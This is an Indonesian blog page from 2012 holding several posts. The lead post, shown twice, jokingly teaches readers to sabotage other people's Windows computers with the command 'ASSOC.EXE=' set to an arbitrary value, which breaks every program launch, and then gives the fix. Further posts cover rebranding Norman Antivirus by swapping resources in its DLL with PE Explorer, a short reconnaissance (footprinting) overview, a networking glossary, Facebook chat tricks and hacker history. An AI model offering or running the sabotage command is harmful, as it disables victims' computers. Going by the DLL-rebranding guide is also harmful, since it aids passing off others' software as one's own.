Jumat, 16 November 2012


cara merusak komputer orang lain dalam sekejap


Klik STAR / RUN / CMD.
Ketikkan ASSOC.EXE=terserah kamu mau ngetik apa..
Enter...

Lihat hasilnya..????

Cara mengatasinya...

Klik STAR / RUN / CMD.
Ketikkan COMMAND
Setelah terbuka ketik ASSOC.EXE=FILEEXE




 wah parah nih judulnya, lagi pengen ngerjain orang,hehehe:biggrin:,,Tapi sebelum melanjutkan baca dulu TOS nya!

cara merusak komputer orang lain dalam sekejap 























wah parah nih judulnya, lagi pengen ngerjain orang,hehehe:biggrin:,,Tapi sebelum melanjutkan baca dulu TOS nya!

Perhatian "Artikel ini hanya sebagai bahan pembelajaran saja,untuk pembaca n sobat blogger smua,penulis tidak bertanggung jawab atas semua kerugian dan tindak kekerasan yang disebabkan oleh artikel ini!,,Silahkan terapkan pada diri sendiri dulu sebelum di praktekin ke orang lain!"...

Teknik merusak komputer yang satu ini tergolong teknik yang paling gampang dilakukan,karna tidak memerlukan software,namun kerusakan yang ditimbulkannnya sangat parah bahkan kalau para master komputer sekalipun kalau menemukan kerusakan seperti ini pasti langsung berpikir tidak bisa diselamatkan lagi jalan satu2nya instal ulang saja.

Kerusakan yang ditimbulkan adalah tidak berfungsi semua aplikasi,Komputer tetap berjalan normal dari mulai booting sampai masuk windows namun setelah itu tidak dapat digunakan lagi karna tidak bisa membuka satu aplikasi pun,,,,hmm lumayan parah

Cara membuat kerusakan seperti ini cukup mudah

klik star/ run / CMD
Ketikkan ASSOC.EXE = terserah kamu mau ngetik apa
Enter

Lihat hasilnya,,coba jalankan komputer,,

kenapa ini bisa terjadi?,,ini disebabkan fungsi exe yang tidak berfungsi lagi,,coba pake winnrar,,lihat file2 yang berakhiran .exe seperti winamp exe,dan aplikasi lainnya sekarang sudah berubah menjadi nama yang kamu ketikkan tadi


Trus gimana cara mengatasinya?

cara mengatasinya cukup mudah

Klik star run / ketikkan COMMAND
Setelah terbuka  ketik ASSOC.EXE=EXEFILE

Setelah itu komputer akan bekerja normal kembali...

Mudahkan merusak komputer orang:biggrin: apabila anda menemukan kasus yang rusaknya seperti ini mungkin pengalaman anda setelah membaca tulisan ini  bisa membantu


cara merusak komputer orang lain dalam sekejap 
wah parah nih judulnya, lagi pengen ngerjain orang,hehehe:biggrin:,,Tapi sebelum melanjutkan baca dulu TOS nya!

Perhatian "Artikel ini hanya sebagai bahan pembelajaran saja,untuk pembaca n sobat blogger smua,penulis tidak bertanggung jawab atas semua kerugian dan tindak kekerasan yang disebabkan oleh artikel ini!,,Silahkan terapkan pada diri sendiri dulu sebelum di praktekin ke orang lain!"...

Teknik merusak komputer yang satu ini tergolong teknik yang paling gampang dilakukan,karna tidak memerlukan software,namun kerusakan yang ditimbulkannnya sangat parah bahkan kalau para master komputer sekalipun kalau menemukan kerusakan seperti ini pasti langsung berpikir tidak bisa diselamatkan lagi jalan satu2nya instal ulang saja.

Kerusakan yang ditimbulkan adalah tidak berfungsi semua aplikasi,Komputer tetap berjalan normal dari mulai booting sampai masuk windows namun setelah itu tidak dapat digunakan lagi karna tidak bisa membuka satu aplikasi pun,,,,hmm lumayan parah

Cara membuat kerusakan seperti ini cukup mudah

klik star/ run / CMD
Ketikkan ASSOC.EXE = terserah kamu mau ngetik apa
Enter

Lihat hasilnya,,coba jalankan komputer,,

kenapa ini bisa terjadi?,,ini disebabkan fungsi exe yang tidak berfungsi lagi,,coba pake winnrar,,lihat file2 yang berakhiran .exe seperti winamp exe,dan aplikasi lainnya sekarang sudah berubah menjadi nama yang kamu ketikkan tadi


Trus gimana cara mengatasinya?

cara mengatasinya cukup mudah

Klik star run / ketikkan COMMAND
Setelah terbuka  ketik ASSOC.EXE=EXEFILE

Setelah itu komputer akan bekerja normal kembali...

Mudahkan merusak komputer orang:biggrin: apabila anda menemukan kasus yang rusaknya seperti ini mungkin pengalaman anda setelah membaca tulisan ini  bisa membantu


cara merusak komputer orang lain dalam sekejap 

Rabu, 14 November 2012


 Trik Cara Membuat Chat Berwarna di Facebook

Contoh Chat Berwarna ™JRKoetaii™
CHAT TEXT GENERATOR RAINBOW>> http://www.facebook.com/pages/NEW-BIKIN-TAMPILAN-FB-UNIK-DAN-BEDA-SAMA-YANG-LAIN-KLIK-SUKA/157322094375762?sk=app_253903771317101

CHAT TEXT GENERATOR GREEN>>http://www.facebook.com/pages/NEW-BIKIN-TAMPILAN-FB-UNIK-DAN-BEDA-SAMA-YANG-LAIN-KLIK-SUKA/157322094375762?sk=app_282891808387810

CHAT TEXT GENERATOR BLOCK
>> http://www.facebook.com/pages/NEW-BIKIN-TAMPILAN-FB-UNIK-DAN-BEDA-SAMA-YANG-LAIN-KLIK-SUKA/157322094375762?sk=app_120720641365204


Buat Code Text Mu disitu, Lalu Copy dan Paste di Chat Teman / Inbox okay ^^

 All About Network (Dasar2 jaringan)

Maaf Yau klo nie postingan mgkn dah basi bagi agan2 yg dh Pro..tp dsni di rangkum semua dasar yg harus diketahui dlm bljr jaringan sblum mulai mmasuki dsar2 mjd Hacking n cracking (pembobol security)...
Posting nieq dpt dr Forum jg tp d tmbhin dkit2....^_^  MET MEMBACA...

Jaringan : jaringan (network) adalah kumpulan dua atau lebih sistem komputer yang terhubung. Terdapat banyak jenis jaringan komputer:
a. Local-Area Network (LAN): komputer yang terhubung berada pada tempat yang berdekatan secara gografis (misalkan satu gedung).
b. Wide-Area Network (WAN): komputer yang terhubung berada pada tempat yang berjauhan dan dihubungkan dengan line telepon atau gelombang radio. selain itu, jaringan komputer dapat juga dikelompokan berdasar kriteria di bawah ini:
Topologi : pengaturan keterhubungan antar sistem komputer. Terdapat bermacam-macam topologi seperti bus, star, dan ring.
Protokol : protokol mendefinisikan sekelompok aturan dan sinyal yang digunakan oleh komputer pada jaringan untuk berkomunikasi. Protokol LAN yang paling populer adalah Ethernet. Protokol LAN lain yang banyak digunakan adalah IBM token-ring network.c. arsitektur: jaringan dapat diklasifikasikan ke dalam arsitektur peer-to-peer atau client/server.

NIC : NIC (network interface card) adalah expansion board yang digunakan supaya komputer dapat dihubungkan dengan jaringan. Sebagian besar NIC dirancang untuk jaringan, protokol, dan media tertentu. NIC biasa disebut dengan LAN card (Local Area Network Card).
Backbone : Backbone adalah saluran atau koneksi berkecepatan tinggi yang menjadi lintasan utama dalam sebuah jaringan. Bandwidth : Bandwidth menunjukan kapasitas dalam membawa informasi. Istilah ini dapat digunakan dalam banyak hal: Telepon, jaringan kabel, bus, sinyal frekuensi radio, dan monitor. Paling tepat, bandwidth diukur dengan putaran perdetik (cycles per second), atau hertz (Hz), yaitu perbedaan antara frekuensi terendah dan tertinggi yang dapat ditransmisikan. Tetapi juga sering digunakan ukuran bit per second (bps).
Bridge : Bridge adalah peranti yang meneruskan lalu lintas antara segmen jaringan berdasar informasi pada lapisan data link. Segmen ini mempunyai alamat lapisan jaringan yang sama. Setiap jaringan seharusnya hanya mempunyai sebuah bridge utama.
DNS : DNS (domain name sistem) adalah sistem yang menerjemahkan domain Internet, seperti www.microsoft.com menjadi alamat Internet, yaitu serangkaian nomor yang terlihat seperti 101.232.12.5. Istilah DNS berhubungan dengan konvensi untuk penamaan host pada Internet dan cara penangan nama-nama tersebut.
Ethernet : Ethernet adalah protokol LAN yang dikembangkan oleh Xerox Corporation yang bekerjasama dengan DEC dan Intel pada tahun 1976. Ethernet menggunakan topologi bus atau star dan medukung transfer data sampai dengan 10 Mbps. Versi Ethernet yang lebih baru yang disebut 100Base-T (atau Fast Ethernet), mendukung transfer data sampai dengan 100 Mbps, dan versi terbarunya, Gigabit Ethernet, mendukung tranfer data sampai dengan 1 Gigabit per detik atau 1000 Mbps.
Fast Ethernet : Fast Ethernet seperti Ethernet biasa, namun dengan kecepatan transfer data yang lebih cepat, sampai dengan 100 mbps. Ethernet ini juga disebut 100BaseT.
Gateway : Istilah gateway merujuk kepada hardware atau software yang menjembatani dua aplikasi atau jaringan yang tidak kompatibel, sehingga data dapat ditransfer antar komputer yang berbeda-beda. Salah satu contoh penggunaan gateway adalah pada email, sehingga pertukaran email dapat dilakukan pada sistem yang berbeda.
GPS : GPS (Global Positioning System ) adalah sistem navigasi menggunakan 24 satelit MEO (medium earth orbit atau middle earth orbit) yang mengelilingi bumi dan penerima-penerima di bumi. Satelit mengorbit pada ketinggian sekitar 12.000 mil di atas bumi dan mampu mengelilingi bumi dua kali dalam 24 jam. Satelit GPS secara kontinu mengirimkan sinyal radio digital yang mengandung data lokasi satelit dan waktu pada penerima yang berhubungan. Satelit GPS dilengkapi dengan jam atom dengan ketepatan satu per satu juta detik. Berdasar informasi ini, stasiun penerima mengetahui berapa lama waktu yang digunakan untuk mengirim sinyal sampai ke penerima di bumi. Semakin lama waktu yang digunakan untuk sampai ke penerima, semakin jauh posisi satelit dari stasiun penerima. dengan mengetahui posisi satelit, penerima mengetahui bahwa satelit terletak pada posisi tertentu pada permukaan bola imaginer yang berpusat pada satelit. Dengan menggunakan tiga satelit, GPS dapat menghitung lintang dan bujur penerima berdasar perpotongan ketiga bola imaginer. Dengan menggunakan empat satelit, dapat juga ditentukan ketinggian. GPS dikembangkan dan dioperasikan oleh Departemen Pertahanan Amerika. GPS, asalnya dikenal dengan NAVSTAR (Navigation System with Timing and Ranging). Sebelum untuk keperluan yang lebih luas, GPS digunakan untuk menyediakan kemampuan navigasi sepanjang waktu dan dalam segala cuaca untuk militer darat, laut, dan angkatan udara. Disamping untuk navigasi dan penentuan posisi geografik, GPS dapat juga digunakan di antaranya untuk pemetaan, kehutanan, eksplorasi mineral, manajemen habitat liar, dan pengawasan perpindahan penduduk.
Host : Host adalah sistem komputer yang diakses oleh pengguna yang bekerja pada lokasi yang jauh. Biasanya, istilah ini digunakan jika ada dua sistem komputer yang terhubung dengan modem dan saluran telepon. Sistem mengandung data yang disebut host, sedang sitem yang digunakan untuk mengases dari jarak jauh disebut remote terminal. Istilah host juga digunakan untuk menyebut komputer yang terhubung dengan jaringan TCP/IP, termasuk Internet. Setiap host mempunyai alamat IP yang unik. Selain itu, istilah host juga merujuk pada penyediaan infrastruktur layanan komputer. Sebagai contoh, banyak perusahaan yang menjadi host Web server, yang berarti bahwa perusahaan tersebut menyediakan hardware, software, dan saluran komunikasi yang dibutuhkan oleh server, tetapi isi server (data) dikendalikan oleh pihak lain. ISP (Internet Service Provider) : ISP (Internet service provider) adalah penyedia layanan Internet. Sebagian besar ISP mempunyai jaringan server (mail, berita, Web), router, modem yang dihubungkan dengan koneksi “backbone” Internet yang permanen dan berkecepatan tinggi. Pelanggan ISP dapat mendapatkan koneksi Internet dengan modem dan telepon. Untuk mengakses Internet pelanggan ISP harus melakukan dial ke jaringan dengan menekan nomor telepon tertentu milik ISP.
Internet : Internet adalah jaringan global yang menghubungkan jutaan komputer. Sejak 1999 Internet telah memiliki 200 juta pemakai di seluruh dunia, dan jumlah ini meningkat cepat. Lebih dari 100 negara terhubung dengan Internet untuk menukar data, berita, dan informasi lainnya. Setiap komputer yang terhubung dengan Internet disebut host.
ISDN : ISDN (Integrated Services Digital Network) adalah standard komunikasi internasional untuk pengiriman suara, video dan data melalui line telepon digital atau telepon kawat biasa. ISDN mempunyai kecepatan transfer data 64 Kbps. Sebagian besar saluran ISDN ditawarkan oleh perusahaan telepon yang memungkinkan dua saluran, yang disebut kanal B (B channel). Satu line dapat digunakan untuk suara dan yang lain untuk data lain dan keduanya mempunyai kecepatan transfer 128 Kbps. Versi awal ISDN menggunakan transmisi baseband. Versi lain ISDN, yaitu B-ISDN, menggunakan transmisi broadband dan dapat mendukung transmisi data dengan kecepatan 1,5 Mbps.
Protocol (protokol) : Bahasa atau prosedur hubungan yang digunakan oleh satu sistem komputer dengan sistem lainnya sehingga antara keduanya dapat saling berhububngan. Untuk dapat berkomunikasi. Kedua system harus menggunakan protokol yang sama. PPP (Point To Point Protocol) : Protokol TCP/IP yang memungkinkan hubungan antara host dengan jaringan dan antara router dengan router atau dapat pula digunakan untuk hubungan serial antara 2 system.
Repeater : Suatu perangkat yang dipasang di titik-titik tertentu dalam jaringan untuk memperbarui sinyal-sinyal yang di transmisikan agar mencapai kembali kekuatan dan bentuknya yang semula, guna memperpanjang jarak yang dapat di tempuh. Ini di perlukan karena sinyal-sinyal mengalami perlemahan dan perubahan bentuk selama transmisi.
Router : Suatu perangkat yang berfungsi menghubungkan suatu LAN ke suatu internetworking/WAN dan mengelola penyaluran lalu-lintas data di dalamnya. Routing : Proses dari penentuan sebuah path yang di pakai untuk mengirim data ke tujuan tertentu.
RJ-45 : RJ-45 (Registered Jack-45) adalah konektor delapan kabel yang biasanya digunakan untuk menghubungkan komputer ke sebuah local-area network (LAN), khususnya Ethernets. Konektor RJ-45 mirip dengan konektor RJ-11 yang digunakan dalam koneksi telepon, tetapi lebih besar.
Server : Suatu unit yang berfungsi untuk menyimpan informasi dan untuk mengelola suatu jaringan komputer.komputer server akan melayani seluruh client atau worstation yang terhubung ke jaringannya.
TCP/IP : TCP/IP Transmission Control Protokol adalah dua buah protokol yang dikembangkan oleh militer AS yang memungkinkan komputer pada jaringan dapat saling berhubungan. IP digunakan untuk memindahkan paket data antarsimpul. TCP dugunakan untuk memverifikasi pengiriman dari client ke server. TCP/IP adalah dasar internet dan dapat ditemukan pada semua system operasi modern, seperti Unix dan Windows.
Topologi : Dalam jaringan komputer topologi adalah bentuk pengaturan keterhubungan antar sistem komputer. terdapat bermacam-macam topologi seperti bus, star, ring.
UTP : UTP (Unshielded Twisted Pair) adalah jenis kabel yang terdiri dari dua kawat tak terbungkus yang berpilin. Kabel UTP banyak digunakan pada local-area networks (LANs) dan sambungan telepon karena harganya lebih murah. Kabel UTP tidak sebaik kabel koaksial dan serat optik dalam hal penyediaan banwidth dan ketahanan terhadap interferensi.
VLAN : VLAN (virtual local-area network) adalah jaringan komputer yang seakan terhubung menggunakan kabel yang sama meskipun mungkin secara fisik berada pada bagian LAN yang lain. VLAN dikonfigurasi melalui software dan tidak hardware, yang membuatnya sangat fleksible.Salah satu keunggulan VLAN adalah jika sebuah komputer secara fisik dipindah ke lokasi lain, komputer tersebut tetap pada VLAN yang sama tanpa melakukan konfigurasi ulang hardware.
VPN : VPN (virtual private network) adalah koneksi internet pribadi yang aman dan terenkripsi untuk menjamin bahwa hanya pengguna yang berhak yang dapat mengaksesnya dan trasfer data yang dilakukan tidak dapat diganggu.
VSAT : VSAT (Very Small Aperture Terminal) stasiun bumi yang digunakan pada satelit komunikasi sinyal data, suara, dan video, kecuali pemancaran televisi. VSAT terdiri dari dua bagian: sebuah transceiver yang diletakkan ditempat terbuka sehingga dapat secara langsung menerima sinyal dari satelit dan sebuah piranti yang diletakkan dalam ruangan untuk menghubungkan transceiver dan piranti komunikasi pengguna akhir(end user), seperti PC.Transceiver menerima dan mengirim sinyal ke transponder satelit diluar angkasa. Satelit mengirimkan dan menerima sinyal dari komputer stasiun bumi yang berfungsi sebagai hub sistem. Setiap pengguna yang saling terhubung dengan stasiunhub melewati satelit, membentuk topologi bintang. hub mengendalikan semua operasi pada jaringan. Semua transmisi untuk komunikasi antar pengguna harus melewati stasiunhub yang meneruskannya ke satelit dan kepengguna VSAT yang lain. VSAT dapat mengirimkan data sampai dengan kecepatan 56 Kbps.
WAN : WAN wide area network adalah komputer yang terhubung berada pada tempat yang berjauhan dan hubungan dengan line telepon atau gelombang radio. Lihat juga LAN dan jaringan.
Wi-Fi : Wi-Fi Wireless Fidelity adalah nama dagang resmi untuk IEEE 802.11b yang dibuat oleh Wireless Ethernet Compatibility Aliance (WECA). Istilah Wi-Fi menggantikan 802.11b seperti halnya istilah Ethernet menggantikan IEEE 802.3. Produk yang disertifikasi oleh WECA sebagai Wi-Fi dapat beroperasi bersama meskipun dibuat oleh perusahaan yang berbeda.
Workstation : Pada jaringan komputer, workstation adalah komputer yang terhubung dengan sebuah local-area network (LAN).Istilah workstation juga digunakan untuk menyebut komputer yang digunakan untuk aplikasi teknik (CAD/CAM), desktop publishing, pengembangan software, dan aplikasi lainnya yang membutuhkan tingkat komputasi dan kemampuan grafis yang cukup tinggi.Workstation biasanya terdiri dari layar grafik yang besar dengan revolusi tinggi, RAM minimal 64 MB, dukungan jaringan built-in, dan graphical user interface.Sebagian besar workstation juga mempunyai piranti penyimpanan seperti disk drive, tetapi jenis workstation khusus, yang disebut diskless workstation, tidak mempunyai disk drive. Sistem operasi yang banyak digunakan untuk workstation adalah UNIX dan windows NT. Seperti halnya PC, sebagian besar workstation adalah komputer single user, Meski demikian, workstation pada dasarnya dihubungkan dengan local area network, meskipun dapat juga sebgian sistem yang berdiri sendiri stand alone.
100BaseT : 100BaseT adalah nama lain fast Ethernet yang mempunyai kecepatan transmisi sampai dengan 100 mbps. Jenis 100BaseT ini lebih mahal daripada 10BaseT dan lebih jarang digunakan pada local area network (LAN).
10Base2 : 10Base2 adalah satu jenis standar Ethernet ( IEEE802.3) untuk lokal area network ( LAN ). Standard 10 Base-2 ( yang juga disebut Thinnet )menggunakan kabel koasial 50 ohm ( RG-58A/U ) dengan panjang maksimal 185 meter.kabel ini lebih kecil dan lebih flesibel daripada yang digunakan untuk standard 10 Base 5. Sistem 10 Base-2 beroperasi pada 10 Mbps dan menggunakan metode tranmisi baseband.
10 Base5 : 10 Base-5 adalqh standard awal untuk Ethernet yang menggunakan kabel koasial. nama 10 Base5 didasarkan pada fakta bahwa kecepatan transfer data maksimum adalah 10 Mbps. menggunakan transmisi Baseband, dan panjang kabel maksimal adalah 500 meter. 10 Base5 juga disebut Thick Wire atau thick Net.
10BaseT : 10BaseT adalah jenis Ethernet yang paling umum. Nama tersebut menunjukan bahwa kecepatan transmisi maksimum adalah 10Mbps. 10BaseT menggunakan kabel tembaga dan merupakan card standard untuk menghubungkan komputer pada lokal area network (LAN). 

 Makna Data Sebenarnya

Hello Sobat HCB....^_^


Keren...it's Wonderfull Experiance....
Pengalaman yang sangat menarik...
Saya lagi heppi karena baru-baru ini habis ikut Workshop Hacker terbesar se Kalimantan dengan tema "Build Cyber World Tallent at Real World" bersama para Hacker terkemuka se Kalimantan....di Banjarmasin yang bertempat di Anonymous...hehe hari Minggu kemaren tepatnya tanggal 26 Februari 2012...pukul 9 malam...dan terima kasih tuk sobat semua yang juga hadir pada malam itu dan ternyata mengenali saya..Salut..sebuah kebanggaan bisa mengenal kalian...

Dari situ saya mendapatkan ilmu yang menarik...
Saya menemukan beberapa fakta yang orang lain jarang tau,,mengenai makna atau arti sebuah kata "Data"

Saya heran kenapa masih banyak orang yang menyebut istilah “data-data” daripada “data”. Padahal, seperti yang kita ketahui, “data” itu maknanya jamak (plural). Sedangkan bentuk tunggal dari “data” adalah “datum”. Tapi istilah “datum” jarang atau malah tidak pernah digunakan (paling tidak, itu yang selama ini saya amati). Pernahkah ada orang yang menyebutkan “datum-datum”? Hampir tidak pernah! Sepertinya akan lebih baik jika mereka cukup menyebutkan “data” saja, dan bukan “data-data” seperti yang selama ini sering kita lihat melalui media televisi.


Penggunaan istilah “data-data” selama ini sebagian besar digalakkan oleh para pembaca berita atau presenter di televisi. Bahkan mereka yang terlibat di dalam suatu program acara di televisi itu pun, baik yang diwawancarai; maupun yang mewancarai ikut-ikutan dan latah. Tidak itu saja, pejabat negara yang sering berpidato, tokoh publik, artis, maupun masyarakat (yang terakhir ini tentu saja terpengaruh dari yang sebelumnya disebutkan tadi), dengan bangga dan lantangnya mengatakan “data-data”, tanpa merasa janggal atau merasa bersalah sedikitpun.

Yang saya lebih tidak habis pikir lagi adalah, apakah produser suatu acara di televisi itu tidak belajar bahasa Indonesia ya? Padahal, yang namanya istilah yang sering disebut secara berulang-ulang, pastilah prosedur acara itu seharusnya (bahkan wajib hukumnya) sudah memahami makna kata “data”, sehingga di setiap acara mereka wajib mengingatkan agar anak buahnya tidak menyebut istilah “data-data”? Berarti selama ini tidak ada satu orang pun yang mengawasi dan mengkoreksi apa yang sudah mereka sampaikan lewat program acara televisi tadi. Hmmmmm, luar biasa!

Ya begitulah akhirnya, orang-orang itu secara langsung dan tidak langsung ikut berperan serta menyebarluaskan istilah yang tidak tepat, dan pada akhirnya menjadi istilah yang dibenarkan di lingkungan masyarakat sampai saat ini. Sungguh suatu kondisi yang memprihatinkan.
Baiklah kalau ternyata mereka belum mengetahui istilah yang benar, meskipun tetap saja sangat aneh rasanya mereka tidak mengetahui istilah “data” adalah yang tepat. Mari kita maafkan saja kesalahan dan dosa mereka, sama seperti Tuhan telah mengampuni kesalahan dan dosa kita.
Kalau ternyata Anda baru kali ini tahu perbedaan antara “datum” dan “data” dan selama ini Anda termasuk salah satu dari sekian banyaknya orang yang pernah menggunakan istilah “data-data”, maka saya menganjurkan agar Anda pada hari ini juga segera bertobat dan kembalilah ke jalan yang benar. Mohon dengan sangat untuk tidak latah atau tidak ikut-ikutan atau tidak menyebutkan lagi istilah “data-data” setelah Anda membaca artikel ini. Cukup katakan “data”!

Tolong jangan melakukan kesalahan yang sama lebih dari satu kali, dan tolong sebar-luaskan artikel ini kepada siapa pun.
Terima kasih..dan semoga bermanfaat..

 Hijacking Program / Software

Hijack…apaan tuh? Umh…sebenarnya banyak artinya, bukan hanya diartikan sebagai pembajakan tapi pembajakan banget…belum ngerti jugak… gini NIH…kalo bajak software kan hanya membajak softwarenya aja…tinggal minjem CD orang yang berisi master software tersebut, kemudian mengcopy dan menginstall di komputer kita. Kalau Hijacking belum sampai disitu ajah… kita dapat mengganti splash screen, nama antivirus itu dan nama copyright atau pembuat atau vendor dari antivirus tersebut. CARANYA MAS…CARANYA… owkay…simak aja cerita di bawah ini
Kali ini kita akan meng-hijack antivirus luar yak .. kali ini contohnya Norman Antivirus. Sebelumnya yang harus dipersiapkan adalah:
1. PE Explorer, donlot aja di internet, banyak kok, PE explorer ini adalah sebuah tools yang digunakan untuk mereverse engineering sebuah software, yaitu membongkar isi sebuah software. Bukan hanya membongkar tapi dapat mengganti atau mengedit gambar, tulisan atau label yang ada di software tersebut
2. Process Explorer untuk melihat program ini memakai file dependensi (.dll) apa agar kita dapat menghijack softwarenya
3.  Master Norman Anti Virus (boleh bajakan, boleh yang asli)
4. Cemilan, winamp, rokok n aer putih … ya buat iseng – iseng ajah …


 Okay sekarang kita mulai peng-hijack-an inih…
1. Install Software Norman Antivirus, tau kan cara nginstall-nya, gak usah dijelasin toh.
2. Kemudian Restart Komputer Anda agar lebih keren (apa coba…)
3. Nah setelah restart jalankan process explorer
4. Kemudian jalankan salah satu program dari Norman AV tersebut, misalnya Configuration Editor, Task Editor atau Utilities.
5. Lalu Jalankan process explorer untuk melihat dll apa saja yang dipakai si Norman Antivirus ini untuk menjalankan programnya. Alasannya kenapa file dll yang harus dilihat? Karena dll tersebut adalah sebuah file yang berisi komponen-komponen seperti gambar, icon, tulisan, form dan lain – lain yang digunakan oleh Norman AV untuk menjalankan programnya. Okay let’s check the process explorer

6. Disini kita bisa melihat beberapa aplikasi yang kita jalankan dari Norman AV yaitu : Nvccf.exe, Nvcte.exe dan Nvcut.exe
7. Untuk melihat dll nya klik salah satu program yang disebutkan diatas tadi, misalnya Nvccf.exe:

8. Kemudian lihat kotak bagian bawah untuk meneliti file dll apa aja yang dipakai oleh proses Nvcff.exe, kliatan kan…kemudian coba catat:
Ada Nvccf0q.dll, Nvccf0p.dll, Nvccf0o.dll, dan lain – lain…banyak kan
9. Kemudian klik proses lainnya yaitu Nvcte.exe dan Nvcut.exe untuk mengetahui dll yang dipakai, kemudian catat.
10. Dari 3 program tersebut kita dapat melihat dll yang sama dan dipakai oleh ketiga program tersebut adalah user32.dll, shell32.dll, ole32.dll, oleaut32.dll, Noemrc.dll, Niphk.dll
11. Mari kita lakukan penelitian lagi untuk melihat dll apa saja yang akan kita hijack
12. Kita mulai dari user32.dll…umh kayaknya bukan deh … soalnya user32.dll itu file dll yang digunakan windows, okay … lewat, shell32.dll juga, ole32.dll, oleaut32.dll juga merupakan komponen dll dari windows…lewat semua, yang tersisa sekarang Noemrc.dll dan Niphk.dll.
13. Sekarang kita buka PE Explorer, kemudian cari file Niphk.dll berada, yaitu di %direktori dimana Norman ter-install%\Nvc\bin\
14. Kemudian kemudian tekan tombol Ctrl+R untuk melihat resource-nya
15. Di kotak sebelah kiri anda dapat melihat hanya ada komponen version aja… umh…kayaknya bukan deh…oke lanjut ke dll selanjutnya yaitu Noemrc.dll
16. Buka file Noemrc.dll tersebut memakai PE Explorer, kemudian tekan Ctrl+R seperti tadi, kemudian lihat kotak sebelah kiri
17. Ada beberapa komponen yaitu, bitmap, Icon Entry, String dan Group Icon.
18. Klik yang ada di Bitmap
19. Umh… ada 3 sub komponen gambar, mari kita lihat…BINGGO!!!ketemu…ketiga gambar tersebut adalah bitmap yang dipakai untuk menjalankan aplikasi Norman AV, ketiga gambar yang dimuat adalah :
20. Anda bisa lihat gambar di atas ini adalah yang dipakai oleh aplikasi norman. Coba aja lihat di aplikasi Norman AV yang ada:
21. Nah sekarang untuk menghijack Norman AV ini cukup buat gambar 3 buah, harus berekstensi jpg semua.
22. Kemudian buka file Noemrc.dll dan tekan Ctrl+R
23. Kemudian Klik salah satu komponen dari sub bitmap yang mempunyai caption 101, ganti gambarnya dengan gambar atau logo yang anda buat yaitu dengan menekan tombol Shift+Ctrl+E
24. Kemudian tekan Ctrl+O untuk mencari gambar baru yang digunakan untuk mengganti logo Norman AV.
25. Lakukan langkah seperti di atas untuk sub bitmap 102 dan 103.
26. Setelah itu simpan Noemrc.dll di direktori dimana Norman AV terinstall, misalnya Norman Av terinstall di C:\Norman, maka simpan Noemrc.dll yang baru di direktori C:\Norman\Bin\ dan di C:\Norman\Nvc\Bin\
27. Setelah itu jalankan Norman AV lagi.
28. Lihat perbedaan yang terjadi, seperti gambar di bawah:
29. Jelas bukan logo, gambar yang berdiri di samping kanan diganti sama gambar kita
30. Untuk lebih jelas anda bisa me-restart komputer dan melihat splash screen yang ada …
Nah itulah sekelumit tentang hijacking program atau software. Jadi untuk membajak jangan tanggung – tanggung, sekalian aja diganti semuanya…enak kan… mengakui software yang bukan buatan kita dengan mengatasnamakan program buatan sendiri sungguh mengasyikan bukan (KALAU TIDAK TAU MALU) … yah mo gimana,…sama seperti beberapa program freeware yang anda dibuat…sakitt banget kan kalau program tersebut diakui sebagai program buatan orang lain…bukan program buatan kita…SUDAH FREEWARE DI BAJAK PULA…HAHAHAHAHAHHA…yah…moga2 ilmu ini bermanfaat… okeh, terakhir semoga kita BUKAN termasuk orang – orang seperti ini, Bukan PEMBAJAK lagi namanya tapi PEMBAJAK BANGET…. Mau gitu??

 Footprint (Mencari Informasi Target)


Hai sob..
Kali nie posting yang berguna neh...buat info dan jangan disalahgunakan yach...

Foot print ??? apakah itu ???

Jadi gini...Footprint merupakan salah satu teknik awal untuk mengetahui informasi dari target yang pengen kita hack...banyak cara dalan Footprint ini....antara lain mengetahui IP address (Netview), Port Scan, Enumeration,Traceroute, Routing,dll.

Selain memakai aplikasi bisa juga menggunakan Google Hacking...dengan memasukkan perintah inurl; intext: dll untuk mencari kelemahan suatu website....

Untuk Footprint dlm satu jaringan...
Metode Pertama yang bisa dan pastinya mudah dipakai adalah menggunakan perintah ping beberapa ip yang ada dalam satu jaringan....setelah didapat kita ambil informasi mengenai ip target...workgroup..MAC address...dan informasi penting lainnya...

Setelah itu Metode Kedua adalah dengan menscan Port yang aktif....sehingga kita bisa masuk ke direktori yang port x terbuka....

Tahap selanjutnya akan lanjut ke tahap Enumeration, Escalating Privelage, Social Enginering and Password Cracking yang akan saya bahas di lain waktu....n sekalian menambah ilmu....cp tw kita bs sharing ilmu hacking yang lebih Pro lagi....

Pesan dikit.....Belajarlah mengembangkan ilmu sendiri...jangan mengandalkan aplikasi atau menjadi Scrift Kiddies..karena pada dasarnya memang setiap Hacker Profesional melalui tahap ini....mw Scrift Kiddie mw Scrift kodok gak masalah..hahahaha dari situlah hacker pemula belajar mengenai bahasa program dan aplikasi pendukung hacking.....

 Awal Munculnya Hacker

Peretas (Inggris: hacker) adalah orang yang mempelajari, menganalisa, memodifikasi, menerobos masuk ke dalam komputer dan jaringan komputer, baik untuk keuntungan atau dimotivasi oleh tantangan.
[sunting] Sejarah
Terminologi peretas muncul pada awal tahun 1960-an di antara para anggota organisasi mahasiswa Tech Model Railroad Club di Laboratorium Kecerdasan Artifisial Massachusetts Institute of Technology (MIT). Kelompok mahasiswa tersebut merupakan salah satu perintis perkembangan teknologi komputer dan mereka berkutat dengan sejumlah komputer mainframe. Kata bahasa Inggris "hacker" pertama kalinya muncul dengan arti positif untuk menyebut seorang anggota yang memiliki keahlian dalam bidang komputer dan mampu membuat program komputer yang lebih baik daripada yang telah dirancang bersama.
Kemudian pada tahun 1983, istilah hacker mulai berkonotasi negatif. Pasalnya, pada tahun tersebut untuk pertama kalinya FBI menangkap kelompok kriminal komputer The 414s yang berbasis di Milwaukee, Amerika Serikat. 414 merupakan kode area lokal mereka. Kelompok yang kemudian disebut hacker tersebut dinyatakan bersalah atas pembobolan 60 buah komputer, dari komputer milik Pusat Kanker Memorial Sloan-Kettering hingga komputer milik Laboratorium Nasional Los Alamos. Satu dari pelaku tersebut mendapatkan kekebalan karena testimonialnya, sedangkan 5 pelaku lainnya mendapatkan hukuman masa percobaan.
Kemudian pada perkembangan selanjutnya muncul kelompok lain yang menyebut-nyebut diri sebagai peretas, padahal bukan. Mereka ini (terutama para pria dewasa) yang mendapat kepuasan lewat membobol komputer dan mengakali telepon (phreaking). Peretas sejati menyebut orang-orang ini cracker dan tidak suka bergaul dengan mereka. Peretas sejati memandang cracker sebagai orang malas, tidak bertanggung jawab, dan tidak terlalu cerdas. Peretas sejati tidak setuju jika dikatakan bahwa dengan menerobos keamanan seseorang telah menjadi peretas.

